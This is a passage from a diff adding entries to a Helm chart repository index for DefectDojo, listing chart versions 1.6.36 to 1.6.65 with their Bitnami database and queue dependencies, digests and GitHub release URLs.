'@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: aa709db40ecdeb170a22d02cc838aabf97d55256568cc6a85bef6cadd9a15b5a + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.22.0/defectdojo-1.6.65.tgz + version: 1.6.65 + - apiVersion: v2 + appVersion: 2.21.2 + created: "2023-04-24T18:17:38.992525299Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3277b58f737cb8294a20b9e7237354cc332179cf29148f55682c450e2f89e1d7 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.21.2/defectdojo-1.6.64.tgz + version: 1.6.64 + - apiVersion: v2 + appVersion: 2.21.1 + created: "2023-04-17T16:06:18.283594499Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c5658a6be1b285da1adbccaf1c162f874cb9e97e05b29dcbfbfce836b551e2e7 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.21.1/defectdojo-1.6.63.tgz + version: 1.6.63 + - apiVersion: v2 + appVersion: 2.21.0 + created: "2023-04-03T15:38:28.534049228Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 2546e49ea395eeefe3e167548639c3577e644864fb7b5d0cfbdf9b79866f8e49 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.21.0/defectdojo-1.6.62.tgz + version: 1.6.62 + - apiVersion: v2 + appVersion: 2.20.3 + created: "2023-03-27T19:52:56.80658812Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0387cc2638edb49f90dcc02ed215149b824d074bba7b0c2954a3de4cf13b28bc + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.20.3/defectdojo-1.6.61.tgz + version: 1.6.61 + - apiVersion: v2 + appVersion: 2.20.2 + created: "2023-03-20T17:17:57.574104555Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 2776a5a2afc896cf0feda2a6ce68d4fcb7a55bf2a0269aeb7aff2d79c66a451b + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.20.2/defectdojo-1.6.60.tgz + version: 1.6.60 + - apiVersion: v2 + appVersion: 2.20.1 + created: "2023-03-13T17:13:51.078435366Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 9723597fb56b2ff86350af42b0c75300ffe7b337525d955f4d52e1f55ff6e159 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.20.1/defectdojo-1.6.59.tgz + version: 1.6.59 + - apiVersion: v2 + appVersion: 2.20.0 + created: "2023-03-06T18:52:27.383059079Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0eed06252f537750cf88bfbe7e45067e957dcf49fc6f92ded451962ad6879ed6 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.20.0/defectdojo-1.6.58.tgz + version: 1.6.58 + - apiVersion: v2 + appVersion: 2.19.4 + created: "2023-02-27T19:05:32.509926337Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a05d012c99ccaf37be34f5e46a85603e7a564912578360a9e939f85c3b534378 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.19.4/defectdojo-1.6.57.tgz + version: 1.6.57 + - apiVersion: v2 + appVersion: 2.19.3 + created: "2023-02-25T01:48:04.493518437Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 669526c8fedacd25fdb3237d729acd9d5e3036deddbc377897b9bae3e1ace75d + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.19.3/defectdojo-1.6.56.tgz + version: 1.6.56 + - apiVersion: v2 + appVersion: 2.19.2 + created: "2023-02-20T16:30:18.728480419Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 87bf4758a4c272099f58f7755899ca374f03b3f9eb4b498efddc9428effe7d0d + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.19.2/defectdojo-1.6.55.tgz + version: 1.6.55 + - apiVersion: v2 + appVersion: 2.19.1 + created: "2023-02-13T18:21:31.785694403Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 03a2a454e44e721ee0db4c2b27617c611cb975fd8e7f99104e86c5cf10518996 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.19.1/defectdojo-1.6.54.tgz + version: 1.6.54 + - apiVersion: v2 + appVersion: 2.19.0 + created: "2023-02-06T22:09:23.728511028Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 070eaa2f12d032125ebaee6ec58d101360c791a289dd345f2efdda19a4377797 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.19.0/defectdojo-1.6.53.tgz + version: 1.6.53 + - apiVersion: v2 + appVersion: 2.18.4 + created: "2023-01-30T17:47:02.334427165Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: cf9bee0eaf21902c6b71c6423f13e121564c3bdcc10b39a0cd9ca9f0dbb5ae78 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.18.4/defectdojo-1.6.52.tgz + version: 1.6.52 + - apiVersion: v2 + appVersion: 2.18.3 + created: "2023-01-23T16:41:18.916454587Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 97c610515049ce63391b1f22643391dff4d2285be121372e961c89fc7b8482ea + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.18.3/defectdojo-1.6.51.tgz + version: 1.6.51 + - apiVersion: v2 + appVersion: 2.18.2 + created: "2023-01-16T16:50:28.907542792Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c8596a2d223923fc265a0a17457d5d73e5bf85ecd0871c4988ce9d60d0159d86 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.18.2/defectdojo-1.6.50.tgz + version: 1.6.50 + - apiVersion: v2 + appVersion: 2.18.1 + created: "2023-01-09T17:15:20.669770581Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 950246e50061c64eec2cb1465ef7ac4adc0113edce1b9d941dd60c7ffaa4e6c7 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.18.1/defectdojo-1.6.49.tgz + version: 1.6.49 + - apiVersion: v2 + appVersion: 2.18.0 + created: "2023-01-03T18:31:49.163883646Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3f409820993ca7c2bb551f24df2342e57e24fdccb5f9f24f0f83b57d2bb89694 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.18.0/defectdojo-1.6.48.tgz + version: 1.6.48 + - apiVersion: v2 + appVersion: 2.17.0 + created: "2022-12-06T18:25:13.197640601Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: d4b643f6eb1577a47a7f424d532d5a9debcd32caed14e0290a02f4f3d52ed2e2 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.17.0/defectdojo-1.6.47.tgz + version: 1.6.47 + - apiVersion: v2 + appVersion: 2.16.2 + created: "2022-11-15T04:29:05.975310957Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 73fa2a4551c7a23a20d11f17dd3401a0bcc4c315263aa32e6221ca4279bbf51a + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.16.2/defectdojo-1.6.46.tgz + version: 1.6.46 + - apiVersion: v2 + appVersion: 2.16.1 + created: "2022-11-10T17:35:22.365416193Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 097b0023eb4015f7e88765978e4dbeadbb0592d4fe930c245ae0ea89782b2d46 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.16.1/defectdojo-1.6.45.tgz + version: 1.6.45 + - apiVersion: v2 + appVersion: 2.16.0 + created: "2022-11-02T03:24:26.524052443Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 6f1ba84bfa66ad25a4c79056a5902246dd862bd5c3657d72d571865ce573929f + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.16.0/defectdojo-1.6.44.tgz + version: 1.6.44 + - apiVersion: v2 + appVersion: 2.15.1 + created: "2022-10-13T05:48:41.860630373Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 5ce3079aeeb4c1562e37ade02f43c1e322791ef16c5fbb92d581300018151c36 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.15.1/defectdojo-1.6.43.tgz + version: 1.6.43 + - apiVersion: v2 + appVersion: 2.15.0 + created: "2022-10-04T17:27:12.647231586Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 7405fe661786d9f0599f06e5a5217c3685d2390a8993f4d22aadd03597ee251d + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.15.0/defectdojo-1.6.42.tgz + version: 1.6.42 + - apiVersion: v2 + appVersion: 2.14.3 + created: "2022-09-22T01:43:03.47884005Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 31e49dd914df3bfe2c3a1edafcc466c21f279402dc823be445db5fd0fc5a2202 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.14.3/defectdojo-1.6.41.tgz + version: 1.6.41 + - apiVersion: v2 + appVersion: 2.14.2 + created: "2022-09-21T02:16:20.602508978Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 52729ee914fe217d37ba3d80545aff300191486f3976e30db30d3c17d9fceae7 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.14.2/defectdojo-1.6.40.tgz + version: 1.6.40 + - apiVersion: v2 + appVersion: 2.14.1 + created: "2022-09-15T21:00:58.787145528Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 2cc210e8d0eee44723a72a2dd22eeee09567a5b2bb002b60515b9149253401d3 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.14.1/defectdojo-1.6.39.tgz + version: 1.6.39 + - apiVersion: v2 + appVersion: 2.14.0 + created: "2022-09-06T17:38:57.966916182Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 7cf896367338e0f6787601666b6ce9d355e2c4ad01c202361376721d9c27e7ca + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.14.0/defectdojo-1.6.38.tgz + version: 1.6.38 + - apiVersion: v2 + appVersion: 2.13.1 + created: "2022-08-08T22:01:29.927733201Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: dc4581c89aa4e9d98c5e4ee6087cecba369488e20fcb6bda766592ff6ec69c48 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.13.1/defectdojo-1.6.37.tgz + version: 1.6.37 + - apiVersion: v2 + appVersion: 2.13.0 + created: "2022-08-02T17:23:51.626648302Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~9.1.4 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0a8122f8ca32b988895d83a5b11a413a8a28e643c4aff2a7430be4870b8d6a71 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.13.0/defectdojo-1.6.36.tgz + version: 1.6.36 + - apiVersion: v2 + appVersion: 2.12.0 + created: "2022-07-05T18:43:04.057778005Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: 